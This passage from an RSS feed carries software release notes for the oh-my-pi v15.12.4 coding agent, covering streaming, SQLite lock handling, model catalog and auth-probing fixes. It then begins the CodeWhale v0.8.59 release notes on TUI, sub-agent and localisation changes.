<li>Replaced the OpenAI SDK client usage in <code>openai-completions</code>, <code>openai-responses</code>, <code>azure-openai-responses</code>, and <code>openai-codex-responses</code> with the new internal <code>postOpenAIStream</code> OpenAI-wire JSON/SSE transport</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed streaming providers to cancel upstream model requests when the client closes the response body, so interrupted SSE sessions stop instead of continuing in the background</li>
<li>Fixed: provider request builders treat unknown <code>model.maxTokens</code> (<code>null</code>) as "no model cap" instead of coercing to <code>0</code> via <code>Math.min</code>; Anthropic falls back to the 64k Claude-Code cap for its required <code>max_tokens</code>.</li>
<li>Fixed transient stream failures on OpenAI-compatible providers by retrying HTTP 408/429/5xx responses and transient network errors with Retry-After/quota-hint aware backoff</li>
<li>Fixed SSE stream handling for OpenAI-compatible responses by parsing wire-level JSON frames directly and honoring <code>[DONE]</code> termination</li>
<li>Fixed stream error handling for OpenAI-compatible providers by preserving structured HTTP status/headers and response body details from failed requests for retry and strict-tool fallback logic</li>
<li>Fixed OpenAI-compat streams ending with a bare <code>finish_reason: "error"</code> (gateways like OpenRouter reporting upstream failures, e.g. Gemini <code>MALFORMED_FUNCTION_CALL</code>) surfacing as a non-retryable <code>Provider finish_reason: error</code>. The reason is now mapped to <code>Provider returned error finish_reason</code>, which the session retry classifier recognizes as transient, so the turn auto-retries instead of stopping with a pinned error banner.</li>
<li>Fixed <code>SqliteAuthCredentialStore.open()</code> crashing with <code>SQLITE_BUSY_RECOVERY</code> (errno 261) when several <code>omp --session</code> panes restore concurrently after an unclean shutdown: <code>PRAGMA busy_timeout = 5000</code> now runs as a standalone statement BEFORE <code>PRAGMA journal_mode=WAL</code> (the first lock-taking statement during WAL recovery), and <code>open()</code> retries the BUSY family — <code>SQLITE_BUSY</code>, <code>SQLITE_BUSY_RECOVERY</code>, <code>SQLITE_BUSY_SNAPSHOT</code>, <code>SQLITE_BUSY_TIMEOUT</code> — with bounded exponential backoff. The exhausted-retry error message includes the DB path. Exported <code>isSqliteBusyError(err)</code> for callers that need the same classifier (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
<li>Fixed MiniMax-M3 OpenAI-compatible streams rendering reasoning twice when the same chunk carried both <code>&lt;think&gt;…&lt;/think&gt;</code> content and structured <code>reasoning_content</code>; structured reasoning now wins and cumulative MiniMax reasoning snapshots are collapsed to deltas. (<a href="https://github.com/can1357/oh-my-pi/issues/2433" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2433/hovercard">#2433</a>)</li>
<li>Fixed Gemini turns silently halting the agent when the model returned <code>finishReason: STOP</code> with only an empty (or whitespace-only) text part and no tool call — the well-known "empty response" failure. All Google surfaces (public Generative Language <code>streamGoogle</code>, Vertex <code>streamGoogleVertex</code>, and Cloud Code Assist <code>google-gemini-cli</code>/<code>google-antigravity</code>) now classify such a turn as empty via the shared <code>hasMeaningfulGoogleContent</code> check and retry it up to <code>MAX_EMPTY_STREAM_RETRIES</code> times before surfacing an error. The Cloud Code Assist path previously had an empty-stream retry that never fired for this case (its <code>hasContent</code> flag counted an empty-string text part as content), and the public/Vertex path had no retry at all; the retry now emits a single <code>start</code> event so no duplicate partial message leaks downstream.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Added</h3>
<ul>
<li>Added bundled Fireworks models <code>deepseek-v4-flash</code>, <code>kimi-k2.7-code</code>, <code>minimax-m2.5</code>, <code>minimax-m3</code>, <code>nemotron-3-ultra-nvfp4</code>, <code>qwen3.6-plus</code>, and <code>qwen3.7-plus</code></li>
<li>Changed</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Model <code>contextWindow</code>/<code>maxTokens</code> are now <code>number | null</code>; discovery emits <code>null</code> when a provider reports no limit, replacing the <code>222222</code>/<code>8888</code> (<code>UNK_CONTEXT_WINDOW</code>/<code>UNK_MAX_TOKENS</code>) sentinels (now removed). Bundled <code>models.json</code> unknown limits are <code>null</code>.</li>
<li>Changed the <code>github-copilot</code> model context window to <code>524288</code> tokens</li>
<li>Changed Fireworks model discovery to source the control-plane <code>List Models</code> API (<code>GET /v1/accounts/fireworks/models?filter=supports_serverless=true</code>) instead of the OpenAI-compatible <code>/v1/models</code> inference listing. The inference endpoint returns a sparse, account-specific subset that omits on-demand serverless models (e.g. <code>kimi-k2.7-code</code>), so newly published serverless models stayed invisible in the picker until hand-added to the bundled catalog. The control-plane catalog enumerates every serverless model with capability metadata (<code>supportsServerless</code>/<code>supportsTools</code>/<code>supportsImageInput</code>/<code>contextLength</code>/<code>displayName</code>), paginated and filtered to tool-capable <code>READY</code> entries, then merged with bundled/models.dev references — the Kimi K2 max-output clamp and DeepSeek V4 thinking-toggle strip are preserved, and unbundled models default to reasoning so <code>buildModel</code> derives the Fireworks effort map. New serverless releases now surface automatically with no catalog edits.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Filled missing <code>contextWindow</code> and <code>maxTokens</code> in generated <code>models.json</code> for proxy/reseller variants by inheriting limits from canonical-family and segment-reference models</li>
<li>Ignored zero-cost <code>x-ai</code> subscription entries as reference sources when backfilling limits so inflated values are not propagated</li>
<li>Fixed the model cache opening with <code>PRAGMA journal_mode=WAL</code> before <code>PRAGMA busy_timeout</code>, so concurrent omp startups could crash inside <code>getDb()</code> on <code>SQLITE_BUSY</code> during WAL recovery instead of waiting through the transient lock. The busy handler is now installed before the first lock-taking statement (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the top-level <code>--list-models</code> flag path and migrated model listing to the new <code>omp models</code> command</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>omp models</code> command to list and manage models with <code>ls</code>, <code>find</code>, <code>canonical</code>, and <code>refresh</code> actions</li>
<li>Added <code>--json</code> output plus <code>-e/--extension</code>, <code>--no-extensions</code>, and <code>--config</code> controls to <code>omp models</code> listings</li>
<li>Added <code>skills.enableAgentsUser</code> and <code>skills.enableAgentsProject</code> settings (default on) so the canonical OMP-native <code>~/.agent[s]/skills</code> and project-walkup <code>.agent[s]/skills</code> are configurable independently from the third-party Claude/Codex/Pi toggles.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Model registry merge and <code>omp models</code> / model picker handle unknown context/output limits (<code>null</code>) — unknown limits render as <code>-</code> instead of a fake <code>222K</code>/<code>8.9K</code>.</li>
<li>Changed <code>omp models</code> to use cached provider data by default and require <code>omp models refresh</code> for a forced online re-fetch</li>
<li>Updated model-resolution errors to point to <code>omp models</code> when a provider or model is not found</li>
<li>Upgraded workspace catalog packages to their latest versions as of 3 days ago, and refactored the ACP agent implementation to be compatible with <code>@agentclientprotocol/sdk</code> version <code>0.25.0</code>.</li>
<li>Made the <code>zod</code> version requirement in the workspace catalog more tolerant (<code>^4.0.0</code> instead of <code>4.4.3</code>), and aligned type definitions in coding-agent extensibility modules.</li>
<li>Changed <code>/logout</code> to pick a stored account after the provider, so multi-account OAuth providers can remove one credential without logging out every account.</li>
<li>Changed the status-line context% to report the provider's real prompt-token count — anchored on the last assistant response, matching the <code>/context</code> panel and the collab host broadcast — instead of an independent cl100k estimate of the whole conversation. The estimate could read several points high and climb past 100% on subscription/Codex models (whose advertised window, e.g. <code>272K</code>, is already the input budget after reserving max output) while the request was still well within the real limit. Right after compaction the segment now shows <code>?</code> until the next response re-establishes the true count, and the redundant per-message estimate cache was dropped in favor of memoizing <code>getContextUsage()</code>.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed ACP thinking-delta mapping to tolerate live chunks that only carry delta text.</li>
<li>Fixed image input to Ollama (local <code>ollama</code>, <code>ollama-cloud</code>, and any <code>ollama-chat</code> model) failing with an opaque HTTP 400 when an attached image was encoded as WebP. Ollama decodes images through llama.cpp / <code>stb_image</code>, which is built without WebP support, so the resize pipeline now auto-excludes WebP for those models — the automatic equivalent of <code>OMP_NO_WEBP=1</code>, applied across every image path (<code>@file</code> mentions and prompt/paste/CLI attachments, the <code>read</code>/<code>inspect_image</code> tools, <code>eval</code> display images, <code>fetch</code>ed images, and browser screenshots). Other providers are unaffected and still honor <code>OMP_NO_WEBP</code>.</li>
<li>Fixed queued steering/follow-up display to derive from the agent-core queue, so queued chips clear when the core dequeues them and no longer strand after empty-Enter aborts.</li>
<li>Fixed model auth gateway probing to avoid skipping candidates with unknown <code>maxTokens</code> limits (<code>null</code>)</li>
<li>Fixed model listings so providers registered via extensions are now included from <code>-e</code> and configured <code>extensions</code> sources</li>
<li>Fixed <code>/mcp reauth</code>, <code>/mcp test</code>, and <code>/mcp unauth</code> to find and operate on MCP servers reported by <code>/mcp list</code> even when they are only runtime-discovered and not stored in writable config, including namespaced plugin servers like <code>cloudflare:cloudflare-api</code></li>
<li>Fixed MCP server name validation so colon-namespaced server IDs are accepted when persisting reauth overrides so namespaced OAuth MCP servers can be stored in user config as <code>server:subserver</code> entries</li>
<li>Retried assistant turns that stop with reasoning/thinking only and no final text or tool call, so Gemini/Antigravity thought-only <code>STOP</code> responses continue instead of silently ending the session.</li>
<li>Fixed <code>~/.agent[s]/skills</code> not appearing as <code>/skill:&lt;name&gt;</code> commands when every named source toggle (<code>skills.enableCodexUser</code>, <code>skills.enableClaudeUser</code>, <code>skills.enableClaudeProject</code>, <code>skills.enablePiUser</code>, <code>skills.enablePiProject</code>) was off: <code>loadSkills</code> gated the <code>agents</code> provider on <code>anyBuiltInSkillSourceEnabled</code>, so a user who turned off the Claude/Codex/Pi sources to clean noise also lost their own canonical OMP-native skills. The <code>agents</code> provider now reads the dedicated <code>enableAgentsUser</code>/<code>enableAgentsProject</code> toggles, decoupled from the third-party fall-through (<a href="https://github.com/can1357/oh-my-pi/issues/2401" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2401/hovercard">#2401</a>).</li>
<li>Fixed Windows PowerShell image paste so Ctrl+V can fall back to the PowerShell clipboard bridge when the native clipboard reader reports no image (<a href="https://github.com/can1357/oh-my-pi/issues/2429" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2429/hovercard">#2429</a>).</li>
<li>Fixed misaligned box borders in Mermaid ASCII rendering for CJK (Korean/Japanese/Chinese) and emoji labels — affects both fenced <code>mermaid</code> code blocks in assistant messages and the <code>render_mermaid</code> tool. <code>beautiful-mermaid@1.1.3</code> measures label width in UTF-16 code units while terminals render East Asian characters 2 columns wide; a <code>patchedDependencies</code> entry rebuilds its ASCII renderer to measure terminal display columns (grapheme-cluster aware, wcwidth-style policy). The patch mirrors the upstream PR (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654741745" data-permission-text="Title is private" data-url="https://github.com/lukilabs/beautiful-mermaid/issues/128" data-hovercard-type="pull_request" data-hovercard-url="/lukilabs/beautiful-mermaid/pull/128/hovercard" href="https://github.com/lukilabs/beautiful-mermaid/pull/128">lukilabs/beautiful-mermaid#128</a>) and should be dropped once it ships in a release.</li>
<li>Fixed interrupt loader state getting stuck after queued-message aborts by removing the session-layer flush/latch path; empty Enter now aborts the active turn and lets the existing post-unwind queue drain resume normally.</li>
<li>Fixed <code>/goal &lt;objective&gt;</code> and <code>/goal set &lt;objective&gt;</code> during streaming so goal context is steered immediately but objective submission waits for the active turn to finish instead of spamming <code>AgentBusyError</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2454" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2454/hovercard">#2454</a>).</li>
<li>Fixed concurrent <code>omp --session</code> startups (e.g. cmux pane restore after an unclean shutdown) crashing with <code>SQLITE_BUSY_RECOVERY</code> while the agent SQLite databases were still under WAL recovery. The auth credential store and <code>AgentStorage.open()</code> retry the <code>SQLITE_BUSY</code> family with bounded backoff, and every shared SQLite open path (<code>AgentStorage</code>, history, autoresearch, memories, github cache, auto-QA grievances, catalog model cache, stats) now installs the busy handler before the first lock-taking statement so transient WAL recovery contention waits instead of crashing (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
<li>Mnemopi <code>per-project</code> / <code>per-project-tagged</code> bank derivation is now stable for one cwd, ignoring the surrounding git layout. Previously the bank id was hashed from <code>git.repo.resolveSync(cwd)?.repoRoot ?? path.resolve(cwd)</code>, so adding or removing a <code>.git</code> anywhere above the working directory silently repointed the same conversation to a new bank and stranded its memories (e.g. <code>/home/x/projects/repo</code> flipping between <code>projects-…</code> and <code>repo-…</code>). The derivation in <code>packages/coding-agent/src/mnemopi/config.ts</code> now hashes <code>path.resolve(cwd)</code> directly, and session startup widens the recall set with any sibling bank under <code>&lt;dbDir&gt;/banks/</code> whose <code>working_memory</code> rows already carry the active cwd in <code>metadata_json.$.cwd</code>, so memories stranded by the old, less-stable derivation become visible again on the next session without manual migration (<a href="https://github.com/can1357/oh-my-pi/issues/2412" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2412/hovercard">#2412</a>).</li>
<li>Fixed model switching (Ctrl+P role cycling and the alt+p / <code>/switch</code> / <code>/models</code> selector) intermittently freezing the UI for several seconds. <code>AgentSession.setModel</code>/<code>setModelTemporary</code> ran an eager <code>await modelRegistry.getApiKey(model)</code> purely as an existence pre-flight and discarded the value — but <code>getApiKey</code> does real work: it synchronously executes command-backed key programs (<code>apiKey: "!cmd"</code>, <code>execSync</code> with a 10s timeout, blocking the event loop) and refreshes OAuth tokens over the network when one crosses the expiry window (the "fine for a few switches, then a multi-second stall" symptom). Switching now uses the synchronous, side-effect-free <code>ModelRegistry.hasConfiguredAuth</code> check; the concrete key (command execution + OAuth refresh) is still resolved lazily per request via the existing resolver, so an unconfigured provider still fails fast with <code>No API key</code> while a healthy switch never touches the network or spawns a subprocess. <code>hasConfiguredAuth</code> no longer runs the command program or refreshes tokens either, matching its documented "probe without resolving an API key" contract.</li>
<li>Fixed session resume (<code>pi -c</code> / <code>--continue</code> / <code>--session</code>) hanging for ~10s at startup — surfaced by the watchdog as <code>Still starting … phase: createAgentSession &gt; restoreSessionModel</code> — when an OAuth token needed refreshing or the auth broker (<code>OMP_AUTH_BROKER_URL</code>) was unreachable. Picking which saved model to restore is a pure <em>selection</em> that only needs to know whether auth is configured, but <code>restoreSessionModel</code> probed each candidate with the async <code>getApiKey</code>, which refreshes OAuth tokens over the network, executes command-backed key programs, and issues auth-broker requests — so a slow or unreachable endpoint stalled resume for the full refresh timeout per candidate. Startup model selection now uses the synchronous, side-effect-free <code>ModelRegistry.hasConfiguredAuth</code> probe (the same fix already applied to interactive model switching); the concrete key is still resolved lazily on the first request via the resolver.</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed context usage percentage calculations to return null when context window is missing or non-positive, preventing invalid or Infinity/NaN usage display</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>consolidateToEpisodic</code> (the function backing <code>sleep</code> / <code>sleepAllSessions</code>) never populating the episodic graph: the <code>gists</code> and <code>graph_edges</code> tables stayed at 0 rows across every bank even after multiple consolidation cycles, so Polyphonic Recall's <code>graph</code> voice (BFS over <code>findGistsByParticipant</code> / <code>findRelatedMemories</code>) always returned nothing. Consolidation now best-effort ingests the new episodic memory into <code>EpisodicGraph</code> so the gist row, gist→memory <code>ctx</code> edge, fact edges, and cross-memory similarity/entity/temporal edges land alongside the episodic row. Independent of the existing <code>MNEMOPI_PROACTIVE_LINKING</code> flag, which still gates the same enrichment on the <code>remember()</code> write path. (<a href="https://github.com/can1357/oh-my-pi/issues/2435" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2435/hovercard">#2435</a>)</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed native shell execution rejecting quoted heredocs whose closing delimiter is the final line without a trailing newline, matching bash paste-run snippets.</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed the stats dashboard's SQLite init never setting <code>PRAGMA busy_timeout</code>, so a concurrent <code>omp</code> startup hitting WAL recovery could crash <code>initDb()</code> with <code>SQLITE_BUSY</code> instead of waiting through it. The busy handler is now installed before <code>PRAGMA journal_mode=WAL</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2421" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2421/hovercard">#2421</a>).</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li><code>PI_FORCE_HYPERLINKS=1</code> / <code>PI_NO_HYPERLINKS=1</code> env overrides for the OSC 8 hyperlink capability, mirroring the <code>PI_FORCE_SYNC_OUTPUT</code>/<code>PI_NO_SYNC_OUTPUT</code> shape (opt-out beats force-on).</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Auto-enable OSC 8 hyperlinks inside tmux when tmux self-reports &gt;= 3.4 via <code>TERM_PROGRAM_VERSION</code>; tmux 3.4 stores OSC 8 as a cell attribute and forwards it to outer terminals whose <code>terminal-features</code> include <code>hyperlinks</code>. Older tmux, GNU screen, and tmux without a reported version still default off. Resolution is factored into <code>hyperlinksUserOverride()</code> and <code>shouldEnableHyperlinksByDefault()</code> mirroring the sync-output helpers (<a href="https://github.com/can1357/oh-my-pi/issues/2403" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2403/hovercard">#2403</a>).</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed abortable stream wrappers to cancel the source stream on abort, so timeout watchdogs release upstream HTTP bodies instead of only stopping the local reader.</li>
</ul>
<h2>@oh-my-pi/pi-wire</h2>
<h3>Changed</h3>
<ul>
<li>Changed <code>WireModel.contextWindow</code> and <code>ContextUsage.contextWindow</code> to <code>number | null</code> to allow representing unavailable context-window values</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): respect OSC 8 hyperlinks under tmux &gt;= 3.4 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650944240" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2404" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2404/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2404">#2404</a></li>
<li>fix(skills): load ~/.agents/skills even when third-party source toggles are off by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651011756" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2405" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2405/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2405">#2405</a></li>
<li>fix(coding-agent): stabilize mnemopi per-project bank derivation (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651832873" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2412" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2412/hovercard" href="https://github.com/can1357/oh-my-pi/issues/2412">#2412</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651944937" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2414" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2414/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2414">#2414</a></li>
<li>fix(auth): retried SQLITE_BUSY family and hoisted busy_timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652322896" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2423" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2423/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2423">#2423</a></li>
<li>fix(ai): added GITLAB_CLIENT_ID and GITLAB_REDIRECT_URI overrides for gitlab-duo OAuth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652454808" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2425" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2425/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2425">#2425</a></li>
<li>fix(coding-agent): restore Windows image paste fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652851725" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2430" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2430/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2430">#2430</a></li>
<li>fix(ai): deduplicate MiniMax reasoning stream by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654022523" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2434" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2434/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2434">#2434</a></li>
<li>fix(mnemopi): populated gists and graph_edges during consolidation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654648195" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2439" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2439/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2439">#2439</a></li>
<li>fix: align Mermaid ASCII box borders for CJK/emoji labels by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chan1103/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chan1103">@chan1103</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654744037" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2442" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2442/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2442">#2442</a></li>
<li>docs: document project settings and disabledProviders by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655013563" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2448" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2448/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2448">#2448</a></li>
<li>fix(cli): defer goal objectives while streaming by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655927611" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2455" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2455/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2455">#2455</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.12.3...v15.12.4"><tt>v15.12.3...v15.12.4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.8.59]]></title>
<description><![CDATA[v0.8.59
CodeWhale v0.8.59 is a stability and integration release that hardens the TUI,
improves sidebar interactivity, localizes notifications, cleans up user-facing
naming, and adds experimental config and runtime API foundations.

TUI stability and interactivity

Sidebar resize stays live durin...]]></description>
<link>https://tsecurity.de/de/3594735/downloads/v0859/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594735/downloads/v0859/</guid>
<pubDate>Sat, 13 Jun 2026 02:02:07 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>v0.8.59</p>
<p>CodeWhale v0.8.59 is a stability and integration release that hardens the TUI,<br>
improves sidebar interactivity, localizes notifications, cleans up user-facing<br>
naming, and adds experimental config and runtime API foundations.</p>
<hr>
<h2>TUI stability and interactivity</h2>
<ul>
<li><strong>Sidebar resize stays live during active turns</strong> — the split pane no longer<br>
freezes while the model is generating.</li>
<li><strong>Sidebar hover stays live while loading</strong> — detail popovers update in real<br>
time instead of dropping mid-turn.</li>
<li><strong>Hover highlight cleared on exit</strong> — stale highlight state no longer<br>
persists after leaving the sidebar.</li>
<li><strong>Ghostty motion override kept live</strong> — mouse motion events continue to<br>
work correctly in Ghostty terminals.</li>
<li><strong>Mouse-report sanitizer added</strong> — raw SGR mouse reports are sanitized<br>
defensively so corrupted composer input is blocked.</li>
<li><strong>Sidebar Copy action</strong> — the right-click context menu now includes Copy<br>
alongside existing actions.</li>
<li><strong>Richer Work overflow and Agents hover detail</strong> — sidebar detail<br>
popovers surface more information for Work and Agents entries.</li>
<li><strong>Provider-wait state is now observable</strong> — the TUI shows route, idle<br>
budget, and fanout-preflight state during provider waits.</li>
<li><strong>fanout launches are queued behind a visible launch gate</strong> — interactive<br>
fanout no longer stalls the TUI without feedback.</li>
</ul>
<h2>Sub-agent safety and worker-ledger substrate</h2>
<ul>
<li><strong>Sub-agents survive backgrounded waits</strong> — worker cards are no longer<br>
dropped when the TUI yields during long waits.</li>
<li><strong>Interrupted sub-agent lifecycle events are emitted</strong> — stale running<br>
cards are reconciled with actual state.</li>
<li><strong>Runtime-prompt stand-still guard</strong> — the TUI no longer spins in an<br>
autonomous loop when the launch gate is closed.</li>
</ul>
<h2>i18n and user-facing naming</h2>
<ul>
<li><strong>Notifications are now localized</strong> — notification text respects the<br>
configured language instead of always rendering in English.</li>
<li><strong>Tool family labels are localized</strong> — 10 tool family labels now use<br>
MessageId-based i18n.</li>
<li><strong>Config editor labels are localized</strong> — config section editor labels<br>
follow the configured language.</li>
<li><strong>"Bash" shown in user-facing UI</strong> — shell execution is surfaced as "Bash"<br>
in the TUI while <code>exec_shell</code> remains the internal tool name.</li>
</ul>
<h2>Provider and model updates</h2>
<ul>
<li><strong>Kimi OAuth credentials aligned with Kimi Code</strong> — the config path for<br>
Kimi OAuth credentials now matches the Kimi Code provider surface.</li>
<li><strong>Kimi K2.7 Code defaults added</strong> — model metadata for Kimi K2.7 Code is<br>
included.</li>
<li><strong>SiliconFlow CN provider config split</strong> — a separate provider entry for<br>
SiliconFlow China is available.</li>
<li><strong>Provider metadata registry refactored</strong> — provider metadata is now<br>
data-driven and easier to extend.</li>
<li><strong>OpenRouter Nemotron preset fixed</strong> — the invalid model ID is corrected.</li>
<li><strong>Provider fallback chain activated</strong> — harvested from community PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4594023769" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/2773" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/2773/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/2773">#2773</a>.</li>
</ul>
<h2>Experimental config and runtime API</h2>
<ul>
<li><strong>Experimental feature flags</strong> — <code>[experimental]</code> config section for goal<br>
and WhaleFlow opt-ins, surfaced through normal config paths.</li>
<li><strong>Runtime API Phase 0 + Phase 1</strong> — brand-neutral naming, capabilities<br>
advertisement, and dynamic tool protocol types for editor/GUI clients.</li>
<li><strong>Command strategy registry</strong> — harvested from community PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4602705372" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/2851" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/2851/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/2851">#2851</a>.</li>
<li><strong>Context source map report</strong> — visibility into rules, tools, memory, and<br>
skills contributions to prompt cost.</li>
</ul>
<h2>Community harvests</h2>
<ul>
